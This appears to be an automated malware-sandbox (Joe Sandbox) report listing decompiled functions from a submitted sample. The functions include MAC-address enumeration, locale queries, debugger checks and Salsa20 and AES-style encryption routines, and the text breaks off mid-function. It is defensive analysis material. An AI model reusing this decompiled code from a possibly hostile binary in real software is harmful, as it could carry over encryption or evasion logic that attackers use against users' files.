Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(006D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_malloc.LIBCMT ref: 0040E68B
_wprintf.LIBCMT ref: 0040E69E
_free.LIBCMT ref: 0040E6A4

Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
_free.LIBCMT ref: 0040E6C5
_malloc.LIBCMT ref: 0040E6CD
GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
_sprintf.LIBCMT ref: 0040E720
_wprintf.LIBCMT ref: 0040E732
_wprintf.LIBCMT ref: 0040E73C
_free.LIBCMT ref: 0040E745

Strings

Address: %s, mac: %s, xrefs: 0040E72D
Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
%02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
API String ID: 3901070236-1604013687
Opcode ID: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
Opcode Fuzzy Hash: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9

Uniqueness

Uniqueness Score: -1.00%

Function 004382A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004382A2(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E00437413(_t28, ?str?) != 0) {
					if(E00437413(_t28, ?str?) != 0) {
						return E00423C92(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}

0x004382a6
0x004382ab
0x004382d3
0x00000000
0x004382fc
0x004382ee
0x0043831a
0x00000000
0x0043831a
0x00000000
0x004382f0
0x00438318
0x00000000
0x00000000
0x0043831e
0x00438323
0x00438327
0x00438327
0x004382f5

APIs

_wcscmp.LIBCMT ref: 004382B9
_wcscmp.LIBCMT ref: 004382CA
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310

Strings

OCP, xrefs: 004382C4
ACP, xrefs: 004382B3

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: InfoLocale_wcscmp
String ID: ACP$OCP
API String ID: 1351282208-711371036
Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E0040C070(intOrPtr __ecx, void* __edx, void* __esi, signed int* _a4, signed char* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v128;
				char _v190;
				void* __ebx;
				void* __edi;
				intOrPtr _t174;
				signed int _t186;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t229;
				signed int _t235;
				signed int _t237;
				void* _t244;
				intOrPtr _t248;
				signed char _t250;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t258;
				signed int _t260;
				signed int _t262;
				signed int _t264;
				signed int _t266;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int* _t272;
				signed int _t276;
				signed int _t277;
				intOrPtr _t284;
				void* _t285;
				void* _t286;
				signed int _t288;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t292;
				signed char* _t293;
				signed int _t294;
				signed int _t295;
				signed char* _t296;
				void* _t297;
				signed int _t298;
				signed int _t299;
				char* _t301;
				void* _t303;
				void* _t305;
				void* _t313;

				_t297 = __esi;
				_t286 = __edx;
				_t251 = _a4;
				_t174 = __ecx;
				_v56 = __ecx;
				_t293 = _a8;
				if(_a4 == 0) {
					L2:
					_push(0x7a);
					E004211DD(_t251, _t286, _t293, _t297, _t309, L"input != nullptr && output != nullptr", L"e:\\doc\\my work (c++)\\_git\\encryption\\encryptionwinapi\\Salsa20.inl");
					_t174 = _v56;
				} else {
					_t309 = _t293;
					if(_t293 == 0) {
						goto L2;
					}
				}
				if(_a12 != 0) {
					_v128 = _t174 -  &_v190;
					_push(_t297);
					do {
						asm("movdqu xmm0, [eax]");
						_v60 = 0xa;
						asm("movdqu [ebp-0x78], xmm0");
						asm("movdqu xmm0, [eax+0x10]");
						asm("movdqu [ebp-0x68], xmm0");
						asm("movdqu xmm0, [eax+0x20]");
						asm("movdqu [ebp-0x58], xmm0");
						_t294 = _v80;
						asm("movdqu xmm0, [eax+0x30]");
						_v8 = _v84;
						_v36 = _v88;
						_v16 = _v92;
						_v48 = _v96;
						_v44 = _v100;
						_v32 = _v104;
						_v12 = _v108;
						_v40 = _v112;
						asm("movdqu [ebp-0x48], xmm0");
						_t252 = _v76;
						_t276 = _v64;
						_t288 = _v68;
						_t298 = _v72;
						_v28 = _v116;
						_v24 = _v120;
						_t186 = _v124;
						_v52 = _t252;
						_v20 = _t186;
						do {
							asm("rol eax, 0x7");
							_v12 = _v12 ^ _t186 + _t252;
							asm("rol eax, 0x9");
							_v16 = _v16 ^ _v12 + _v20;
							asm("rol eax, 0xd");
							_t254 = _v52 ^ _v16 + _v12;
							_v52 = _t254;
							asm("ror eax, 0xe");
							_v20 = _v20 ^ _v16 + _t254;
							asm("rol eax, 0x7");
							_v36 = _v36 ^ _v24 + _v32;
							asm("rol eax, 0x9");
							_t299 = _t298 ^ _v36 + _v32;
							_t255 = _v44;
							asm("rol eax, 0xd");
							_v24 = _v24 ^ _v36 + _t299;
							asm("ror eax, 0xe");
							_v32 = _v32 ^ _v24 + _t299;
							asm("rol eax, 0x7");
							_t289 = _t288 ^ _v8 + _t255;
							asm("rol eax, 0x9");
							_v28 = _v28 ^ _v8 + _t289;
							asm("rol eax, 0xd");
							_t256 = _t255 ^ _v28 + _t289;
							_v44 = _t256;
							asm("ror eax, 0xe");
							_v8 = _v8 ^ _v28 + _t256;
							asm("rol eax, 0x7");
							_t258 = _v40 ^ _t294 + _t276;
							_v40 = _t258;
							asm("rol eax, 0x9");
							_t260 = _v48 ^ _t258 + _t276;
							_v48 = _t260;
							asm("rol eax, 0xd");
							_t295 = _t294 ^ _v40 + _t260;
							asm("ror eax, 0xe");
							_t277 = _t276 ^ _t260 + _t295;
							asm("rol eax, 0x7");
							_v24 = _v24 ^ _v20 + _v40;
							_t217 = _v24;
							_v120 = _t217;
							asm("rol eax, 0x9");
							_v28 = _v28 ^ _t217 + _v20;
							_t219 = _v28;
							_v116 = _t219;
							asm("rol eax, 0xd");
							_t262 = _v40 ^ _t219 + _v24;
							_v40 = _t262;
							asm("ror eax, 0xe");
							_v112 = _t262;
							_t264 = _v20 ^ _v28 + _t262;
							asm("rol eax, 0x7");
							_v44 = _v44 ^ _v32 + _v12;
							_t225 = _v44;
							_v100 = _t225;
							asm("rol eax, 0x9");
							_v20 = _t264;
							_v124 = _t264;
							_t266 = _v48 ^ _t225 + _v32;
							_v48 = _t266;
							asm("rol eax, 0xd");
							_v12 = _v12 ^ _v44 + _t266;
							_t229 = _v12;
							_v108 = _t229;
							asm("ror eax, 0xe");
							_v96 = _t266;
							_t268 = _v32 ^ _t229 + _t266;
							_v32 = _t268;
							_v104 = _t268;
							_t269 = _v36;
							asm("rol eax, 0x7");
							_t294 = _t295 ^ _v8 + _t269;
							asm("rol eax, 0x9");
							_v16 = _v16 ^ _v8 + _t294;
							_t235 = _v16;
							_v92 = _t235;
							asm("rol eax, 0xd");
							_t270 = _t269 ^ _t235 + _t294;
							_t237 = _t270;
							_v36 = _t270;
							_v88 = _t237;
							asm("ror eax, 0xe");
							_v8 = _v8 ^ _t237 + _v16;
							_v84 = _v8;
							asm("rol eax, 0x7");
							_t252 = _v52 ^ _t277 + _t289;
							_v52 = _t252;
							_v76 = _t252;
							asm("rol eax, 0x9");
							_t298 = _t299 ^ _t277 + _t252;
							asm("rol eax, 0xd");
							_t288 = _t289 ^ _t298 + _t252;
							asm("ror eax, 0xe");
							_t276 = _t277 ^ _t288 + _t298;
							_t138 =  &_v60;
							 *_t138 = _v60 - 1;
							_t186 = _v20;
						} while ( *_t138 != 0);
						_t272 = _a4;
						_t244 = 0;
						_v80 = _t294;
						_t296 = _a8;
						_v64 = _t276;
						_v68 = _t288;
						_v72 = _t298;
						do {
							_t301 =  &_v190 + _t244;
							 *(_t305 + _t244 - 0x78) =  *(_t305 + _t244 - 0x78) +  *((intOrPtr*)(_t301 + _v128));
							_t290 =  *(_t305 + _t244 - 0x78);
							 *((char*)(_t301 - 1)) = _t290 >> 8;
							 *(_t305 + _t244 - 0xbc) = _t290;
							_t244 = _t244 + 4;
							 *_t301 = _t290 >> 0x10;
							 *((char*)(_t301 + 1)) = _t290 >> 0x18;
							_t313 = _t244 - 0x40;
						} while (_t313 < 0);
						_t284 = _v56;
						_t292 = _a12;
						 *((intOrPtr*)(_t284 + 0x20)) =  *((intOrPtr*)(_t284 + 0x20)) + 1;
						 *((intOrPtr*)(_t284 + 0x24)) =  *((intOrPtr*)(_t284 + 0x24)) + (0 | _t313 == 0x00000000);
						_t303 =  >=  ? 0x40 : _t292;
						_t285 = 0;
						if(_t303 == 0) {
							goto L12;
						} else {
							goto L10;
						}
						do {
							L10:
							_t292 = _t292 - 1;
							_t250 =  *(_t305 + _t285 - 0xbc) ^  *_t272;
							_t285 = _t285 + 1;
							 *_t296 = _t250;
							_t272 =  &(_t272[0]);
							_t296 =  &(_t296[1]);
						} while (_t285 < _t303);
						_a12 = _t292;
						_a4 = _t272;
						_a8 = _t296;
						L12:
						_t248 = _v56;
					} while (_t292 != 0);
					return _t248;
				}
				return _t174;
			}

0x0040c070
0x0040c070
0x0040c07a
0x0040c07d
0x0040c07f
0x0040c083
0x0040c088
0x0040c08e
0x0040c08e
0x0040c09a
0x0040c09f
0x0040c08a
0x0040c08a
0x0040c08c
0x00000000
0x00000000
0x0040c08c
0x0040c0a9
0x0040c0b9
0x0040c0bc
0x0040c0c0
0x0040c0c0
0x0040c0c4
0x0040c0cb
0x0040c0d0
0x0040c0d5
0x0040c0da
0x0040c0df
0x0040c0e4
0x0040c0e7
0x0040c0ef
0x0040c0f5
0x0040c0fb
0x0040c101
0x0040c107
0x0040c10d
0x0040c113
0x0040c119
0x0040c11f
0x0040c124
0x0040c127
0x0040c12a
0x0040c12d
0x0040c130
0x0040c136
0x0040c139
0x0040c13c
0x0040c13f
0x0040c142
0x0040c147
0x0040c14a
0x0040c153
0x0040c156
0x0040c15f
0x0040c162
0x0040c169
0x0040c16c
0x0040c16f
0x0040c178
0x0040c17b
0x0040c184
0x0040c187
0x0040c189
0x0040c191
0x0040c194
0x0040c19c
0x0040c19f
0x0040c1a7
0x0040c1aa
0x0040c1b1
0x0040c1b4
0x0040c1bc
0x0040c1bf
0x0040c1c6
0x0040c1cc
0x0040c1cf
0x0040c1d5
0x0040c1d8
0x0040c1da
0x0040c1e3
0x0040c1e6
0x0040c1ed
0x0040c1f0
0x0040c1f3
0x0040c1f8
0x0040c1fb
0x0040c203
0x0040c206
0x0040c209
0x0040c20c
0x0040c212
0x0040c215
0x0040c218
0x0040c21b
0x0040c221
0x0040c227
0x0040c22e
0x0040c231
0x0040c234
0x0040c23a
0x0040c242
0x0040c245
0x0040c248
0x0040c24b
0x0040c251
0x0040c254
0x0040c257
0x0040c25d
0x0040c264
0x0040c267
0x0040c26a
0x0040c26d
0x0040c270
0x0040c275
0x0040c278
0x0040c27e
0x0040c283
0x0040c286
0x0040c289
0x0040c28e
0x0040c291
0x0040c298
0x0040c29b
0x0040c29e
0x0040c2a1
0x0040c2a6
0x0040c2a9
0x0040c2ab
0x0040c2ad
0x0040c2b3
0x0040c2b9
0x0040c2bc
0x0040c2c2
0x0040c2c8
0x0040c2cb
0x0040c2cd
0x0040c2d0
0x0040c2d6
0x0040c2d9
0x0040c2de
0x0040c2e1
0x0040c2e6
0x0040c2e9
0x0040c2eb
0x0040c2eb
0x0040c2ee
0x0040c2ee
0x0040c2f7
0x0040c2fa
0x0040c2fc
0x0040c2ff
0x0040c302
0x0040c305
0x0040c308
0x0040c310
0x0040c319
0x0040c31e
0x0040c322
0x0040c32b
0x0040c330
0x0040c337
0x0040c340
0x0040c342
0x0040c345
0x0040c345
0x0040c34a
0x0040c352
0x0040c357
0x0040c35d
0x0040c368
0x0040c36b
0x0040c36f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c371
0x0040c371
0x0040c378
0x0040c379
0x0040c37b
0x0040c37c
0x0040c37e
0x0040c37f
0x0040c380
0x0040c384
0x0040c387
0x0040c38a
0x0040c38d
0x0040c38d
0x0040c390
0x00000000
0x0040c398
0x0040c39e

APIs

__wassert.LIBCMT ref: 0040C09A

Strings

input != nullptr && output != nullptr, xrefs: 0040C095
e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: __wassert
String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
API String ID: 3993402318-1975116136
Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54

Uniqueness

Uniqueness Score: -1.00%

Function 00424168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E00424168(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				char _v800;
				signed int _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t41;
				char* _t46;
				char* _t48;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t59 = __ebx;
				_t41 =  *0x50ad20; // 0x84f4da2
				_t42 = _t41 ^ _t69;
				_v8 = _t41 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00432A69(_t42);
					_pop(_t60);
				}
				_v804 = _v804 & 0x00000000;
				E0042B420( &_v800, 0, 0x4c);
				_v812 =  &_v804;
				_t46 =  &_v724;
				_v808 = _t46;
				_v548 = _t46;
				_v552 = _t60;
				_v556 = _t65;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t23);
				_v540 = _v0;
				_t48 =  &_v0;
				_v528 = _t48;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t48 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				if(E004329EC( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00432A69(_t55);
				}
				return E0042A77E(_t59, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x00424168
0x00424168
0x00424168
0x00424171
0x00424176
0x00424178
0x00424180
0x00424182
0x00424185
0x0042418a
0x0042418a
0x0042418b
0x0042419d
0x004241ab
0x004241b1
0x004241b7
0x004241bd
0x004241c3
0x004241c9
0x004241cf
0x004241d5
0x004241db
0x004241e1
0x004241e8
0x004241ef
0x004241f6
0x004241fd
0x00424204
0x0042420b
0x0042420c
0x00424215
0x0042421b
0x0042421e
0x00424224
0x00424231
0x0042423a
0x00424243
0x0042424c
0x00424258
0x00424269
0x00424275
0x00424278
0x0042427d
0x0042428c

APIs

_memset.LIBCMT ref: 0042419D
IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252

Strings

i;B, xrefs: 00424168

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: DebuggerPresent_memset
String ID: i;B
API String ID: 2328436684-472376889
Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59

Uniqueness

Uniqueness Score: -1.00%

Function 004329EC Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004329EC(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x004329f1
0x00432a01

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00424266,?,?,?,00000001), ref: 004329F1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004329FA

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 957f1cdd405d7a5f8fcfad9397a47528ed4c184e5d77963140c17adbcc220f91
Instruction ID: d7915fe9b98f2e2675b1eb18c11ae3c40c3bb41b36f5f7d781b256b54fe46c91
Opcode Fuzzy Hash: 957f1cdd405d7a5f8fcfad9397a47528ed4c184e5d77963140c17adbcc220f91
Instruction Fuzzy Hash: A7B09271044208ABDA802B93EC59F883F28EB04A62F084022F60D444628F6254508E99

Uniqueness

Uniqueness Score: -1.00%

Function 004387C8 Relevance: 1.5, APIs: 1, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E004387C8(signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				signed int _t6;
				int _t8;

				_t5 =  *0x5292d8; // 0x7ea30b72
				_t6 = _t5 ^  *0x50ad20;
				if(_t6 == 0) {
					 *0x511344 = _a4;
					_t8 = EnumSystemLocalesW(E004387B4, 1);
					 *0x511344 =  *0x511344 & 0x00000000;
					return _t8;
				} else {
					return  *_t6(_a4, _a8, _a12, 0);
				}
			}

0x004387cb
0x004387d0
0x004387d6
0x004387f1
0x004387f6
0x004387fc
0x00438804
0x004387d8
0x004387e6
0x004387e6

APIs

EnumSystemLocalesW.KERNEL32(004387B4,00000001,?,004376BC,0043775A,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 004387F6

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 76856dd23a8d71a9a59fa0d60a1051abde5b3be4023d9c7dc77f759e2ff7a53d
Instruction ID: e2c19f37e5f1fa56fd16d2c75426893bf8b780345540c0397aa12dc95392e8cd
Opcode Fuzzy Hash: 76856dd23a8d71a9a59fa0d60a1051abde5b3be4023d9c7dc77f759e2ff7a53d
Instruction Fuzzy Hash: 4DE08C32150308FBCF21CFA0EC41FD83BA6BB58710F104419F61C4AA60CB71A964EB48

Uniqueness

Uniqueness Score: -1.00%

Function 0043884E Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,20001004,?,0042580F,?,0042580F,?,20001004,?,00000002,?,00000004,?,00000000), ref: 00438875

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 226e58c457aad325719b948ae6d91a641da7dcd0d883941e63e1cbc8cb95818f
Instruction ID: 4201596fe771204303fc80694ffa3c51b65a798dd9aa63856d52ff29377aa1ed
Opcode Fuzzy Hash: 226e58c457aad325719b948ae6d91a641da7dcd0d883941e63e1cbc8cb95818f
Instruction Fuzzy Hash: 7ED0173200020CFF8F01AFE1EC45C6A7B69FF0C314B180409FA1C45120DA36A820EB25

Uniqueness

Uniqueness Score: -1.00%

Function 004329BB Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004329BB(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}

0x004329c8

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,00431DA6,00431D5B), ref: 004329C1

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1db6f696b6536d5221d2cbd00a2ff6cb8be2218350df980964d78d67e6efdd32
Instruction ID: cc44753b31e70f30ed06b04cde14f86973f8491ae5a0d649e7a5859f7922213d
Opcode Fuzzy Hash: 1db6f696b6536d5221d2cbd00a2ff6cb8be2218350df980964d78d67e6efdd32
Instruction Fuzzy Hash: 69A0113000020CAB8A002B83EC088883F2CEA002A0B088022F80C008228B22A8208E88

Uniqueness

Uniqueness Score: -1.00%

Function 0040A710 Relevance: .3, Instructions: 345
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040A710(void* __ecx) {
				signed int _v5;
				unsigned int _v6;
				signed int _v7;
				unsigned int _v8;
				signed int _v9;
				signed int _v10;
				signed int _v11;
				signed int _v12;
				signed int _v13;
				signed int _v14;
				signed int _t256;
				signed int _t342;
				signed int _t345;
				signed char _t371;
				unsigned char _t372;
				unsigned char _t376;
				signed int _t391;
				unsigned char _t400;
				unsigned char _t409;
				signed char _t519;
				void* _t599;
				signed char* _t600;

				_t600 = __ecx + 2;
				_t599 = 4;
				do {
					_t391 =  *(_t600 - 2);
					_v7 = 0x1b;
					_v12 = _t391;
					_t372 =  *(_t600 - 1);
					_v14 = 0x1b;
					_v6 = _t391 + _t391 ^ 0x0000001b;
					_v10 = _t372;
					_v9 =  *_t600;
					_t400 = _t372 + _t372 ^ (_t372 >> 0x00000007) * 0x0000001b;
					_v5 = _t400;
					_t256 = (_t400 >> 7) * 0x1b >> 0x20 >> 7;
					_t376 = _t256 * 0x1b;
					_v11 = (_t256 * 0x0000001b >> 0x00000020) + (_t256 * 0x0000001b >> 0x00000020) ^ _t376;
					_t409 = _v7 + _v7 ^ 0x0000001b;
					_v13 = 0x1b;
					_v8 = _t409;
					 *(_t600 - 2) = ((0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ 0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ _v6 ^ _v10 ^ _v12) + (0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ 0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ _v6 ^ _v10 ^ _v12) ^ ((0x0000001b ^ _t409 + _t409) >> 0x00000007) * 0x0000001b) >> 0x00000007 ^ (((0x0000001b ^ _t409 + _t409) >> 0x00000007) * ((0x0000001b ^ _t409 + _t409) >> 0x00000007) >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (_v11 >> 0x00000007) * 0x0000001b ^ (_t376 >> 0x00000007) * 0x0000001b ^ (((0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ 0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ _v6 ^ _v10 ^ _v12) + (0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ 0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ _v6 ^ _v10 ^ _v12) ^ ((0x0000001b ^ _t409 + _t409) >> 